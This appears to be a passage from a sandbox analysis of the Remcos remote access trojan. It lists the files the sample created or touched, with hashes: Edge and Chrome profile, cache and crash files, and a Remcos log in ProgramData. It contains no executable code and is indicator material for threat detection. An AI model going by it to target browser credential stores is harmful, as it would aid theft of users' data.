| SHA512 | 0d5cf2db54caa6eb1f7b75b6925959b8e29d6d143039a6e437ff64184de2ac62d37f524bd95634408278df95cc5c8521661eb698ee8fc340e9d9f6fbbd54b8bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 35ec3756f03c27bcb9977b6b2e071334 |
| SHA1 | c8c058093e984c47977b7847a2d251b5ec52de8b |
| SHA256 | 40782649602909451371fdc7b8b98e87518969a8c540c7f454bf9666e2672d8e |
| SHA512 | 9f414438425145bab85dd53719941d71cd6ce741295ccc9ba38a8d96f96c03bf4e956d2c062fa25f6344dfd1322326cb626d5f7d8841c73c68857873ad3987ad |
C:\ProgramData\remcos\logs.dat
| MD5 | 4efda76fd4ed39938dcd465f8e6d54e0 |
| SHA1 | 1cf7a843ec5eda6cd061d0ea85a675c2784b538c |
| SHA256 | 38112e8db1238a30c0edb2440397056291b3404c3b869a4be181b5892c3061f6 |
| SHA512 | 442c07cf92d40aff838842170b64d5132c0e7f94e75c9701ed40d1405310e8e05fd0a69afcae02e8f7ff8917a9a7c9baf6b2bcd50eba97a240eab80ed0d69a42 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | b7dac16fa22cebfcb7011457c3478d10 |
| SHA1 | ecca696e10a7a97685c6014e561c0d0d3a3fc93f |
| SHA256 | fa7b0fe59a9512ce841e6b8120d14f2641736e7a8d9fe9d8f0d7ebb6bd3c8a5e |
| SHA512 | 0feddb2ec049f117046bbccd5faffa6beef6f4b0e3002b739d4c4d098fe956ffc11e79a443248924b6c3108253010e26399021234cb02acad5d8d656e17644b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
| MD5 | 49c675e52f585f989e6a2979cd19d2f2 |
| SHA1 | 87c889d43c52fc40bc10ed2ecbf201ef32b033df |
| SHA256 | 8adeb66a812c61f16c4d81e10137c5cdc65f0f4bb89f94d558e512b847fd8a96 |
| SHA512 | 3a27b0cd4734b9d266f9f935f7c21db11a4557839a671f7d153cec656399fa9f72ee1e828cfc70fdd1b4e5ff8d82c2b449bfecb7e7db4af7b0e07bf8998ddb8d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
| MD5 | 76a3f1e9a452564e0f8dce6c0ee111e8 |
| SHA1 | 11c3d925cbc1a52d53584fd8606f8f713aa59114 |
| SHA256 | 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c |
| SHA512 | a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a
| MD5 | d6b36c7d4b06f140f860ddc91a4c659c |
| SHA1 | ccf16571637b8d3e4c9423688c5bd06167bfb9e9 |
| SHA256 | 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92 |
| SHA512 | 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
| MD5 | 710d7637cc7e21b62fd3efe6aba1fd27 |
| SHA1 | 8645d6b137064c7b38e10c736724e17787db6cf3 |
| SHA256 | c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b |
| SHA512 | 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e
| MD5 | d8588a7d7bb0b66fb439edf73ee37563 |
| SHA1 | a2398d543e3fbeb197e2128654bb5a1afd599585 |
| SHA256 | 2210c60cbfec62e2bebd2c77783511100072459b3d0cc296216eab8e72d8af35 |
| SHA512 | 7c87e7b4ec1d643ce2672ef9badefad6832c6fcc4053cedad2d34c52004aed4e0a589e2f839ace7bcdb0f409fff836ca7ce20dc882d9982568176d4b1c830bb9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010
| MD5 | fa645c95565140ec83f575428467aa02 |
| SHA1 | a06bf66c489c105c63e2791d5e9f01ee8f8188e6 |
| SHA256 | f5e4d2555f39de0f20ad80437796389da3deac8379e2dc9fde6df927cc53f525 |
| SHA512 | a728abfc13897cc92ed4761ebf59af9c9b9b45683c963f0265c7767d712151a60b10a11ab2085ff5bb3f8a5b0106dea0e3b5aea63ef5855cca4a39dd211956ad |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | aa3a423aca4c074a8225a4136cbd4a64 |
| SHA1 | f37423dfcfd1d1377290ed0a5df15ce19e8e1d01 |
| SHA256 | df486e89baef5495e7c46593dd0334da54e3d91d3be48de851f4acc66894c71c |
| SHA512 | b70495ecccfa84e9da2833ce62a8ce69a3a29ace97139a39107290bf19f39282652341f55940eec4cf78c2134deb6fcc75fdfc627ee2f41134f8ed3c430b29dc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 039882e966ee4925e97547eded2efb6d |
| SHA1 | 334ba8d2cedf35367ca65fccd38e1db4c8c5a7c3 |
| SHA256 | 256461a1cae29628d9aa2998cde31f8df959b4350e902516292fff05c3f88917 |
| SHA512 | 7da2637802a969d5516a229f58e7cbdd7a76d272207cf6b805ce986a597080dd82734c4114cd327ca73fcf402c7de4c98d60ba7afd80e6a4d591b3ec491a440d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 1a50bb74a6e1c1c90b0746d79237bcb1 |
| SHA1 | 200dc8e07a8e6f84c07a8bcd8121e420ddbad433 |
| SHA256 | 6245601e2b0ca4d8c1d1d59cb57468bb304dea5ec82c07f7c13f2f68224e9f0b |
| SHA512 | 3e9024b35a70bf5048475b3130cb0ea1cbbbee8bbb1ab2038807a9687cba4ed46145b78d37db5059bf3bc9f3c3687b1656efac378161aa8024d5c843e4bd449d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\99b98054-249c-4ec3-bbdd-12cf48aa46ea.dmp
| MD5 | afe70c8b8d5ac3453121887a1d90ad2f |
| SHA1 | dcb24672d3fc78b8243246ef2f4086545466dd13 |
| SHA256 | 7d3ff777c432d1ed5d9186253cbca6b2b3a8bccb5d597c92946da5550f33cea5 |
| SHA512 | a660b424e5221e9ae001079088120f094d518affc38e25893b988e97254168ebce7b4b3dbaab8204a4a985d2bff82f0511e912b11ef212395a09851254dc6049 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | 533a23f5a737926ee547857f53ba3e7d |
| SHA1 | 26600a689cc7867cf48d06aae799a8b25f6d440c |
| SHA256 | 6b458031c661836fd67f3f7a8c62f9c8824a754f86d84219cefb68bff90e2bcb |
| SHA512 | 6a95798e87e707834816ab59583bec194c604e61a0fc3d510f395ba7fe57e45917e8219d655c3058651c626018b333d607e592d1574e60984568a0afe4339b87 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a3c192c6-b609-4ddc-981c-27d716e4eca6.tmp
| MD5 | 78a6db13bef9fc02996c86a1d2dc2fd3 |
| SHA1 | 4026f32ccd2dd744decc0e17ce40e51afc4397e3 |
| SHA256 | 8bf039da6cdb169621280abc188f2a10cbf218ada11020491ba102538b3610c3 |
| SHA512 | f4ab22ab09e344781005bb86f8b0edb0bbdf23bb9df12cb3fbcc047395b023345ee45bba353dfee00565b09058a4318adb1564cd158a812395576db166670c4b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 2fb53631a68e8df75ab735c39103c21f |
| SHA1 | 9b8754b319a42aa7b370b6e0ed797ef32900e2de |
| SHA256 | a445709218e9c6b99c1dace749270799af6a6e46a1450fc1c139a9d9db8e7799 |
| SHA512 | 3d232d37131f7c4b0af36da3a2f4c209552ef790a2928db8c0e016b3ff6fc61bf64c2e387bb2a633d0d0a1006d4959aaaa2635feb6ab4074bc75c33ad6418d64 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
| MD5 | 3cadf200903b4b0aff1383a6b1488e01 |
| SHA1 | b8a7de9cf097d3614bbdf7fb8341a50718e9f719 |
| SHA256 | 808fe5d584f5d1cbff7d0934be41525ac7160266a5a5129460f3be26c4e1e8a2 |
| SHA512 | 044030f57c41d889c9243fd8a62e85b514b0011ab12225013fe3cf9ee61d6a5631990cd78a17059813da208321c89c824ee6675c14a77d195ad355192738f081 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\d8d6f49e-9a73-49a3-9a31-47a458357541.dmp
| MD5 | ad97ce489da5e87e6fb82f8e12b65ff5 |
| SHA1 | eb756dc8b114d25c0ddc4c3fdffd1253770ce49b |
| SHA256 | 0f0caaa3d8670633f63afd47b6496742f560c37eb44d22422bce9a58cfa54a0b |
| SHA512 | b7fe85d69fd2175234b341420a72917aeb523f3ee00f34b6b9a719a67fc623ee68791f007dd6f86e82dbab58b61fff24d86a0a7ed5dc8966dd4c98453e87ddce |
C:\ProgramData\remcos\logs.dat
| MD5 | db043faab564a75466bdc394d7652057 |
| SHA1 | 8afcc5f8611d7e46e71aa99bdc3a641e8dd867a0 |
| SHA256 | 5c5de1fecc0ad84053eb7c2d5cbacc651dfdf265939959489062aa48d5b51029 |
| SHA512 | 038ce64bc27eeb36c7be6596266dc0a281a3e0919369be02177b99f970051dc3eb896ad00b9f06f37f0b261c9c258e98060b0b060d4fce7f32c2d1ccaa77125c |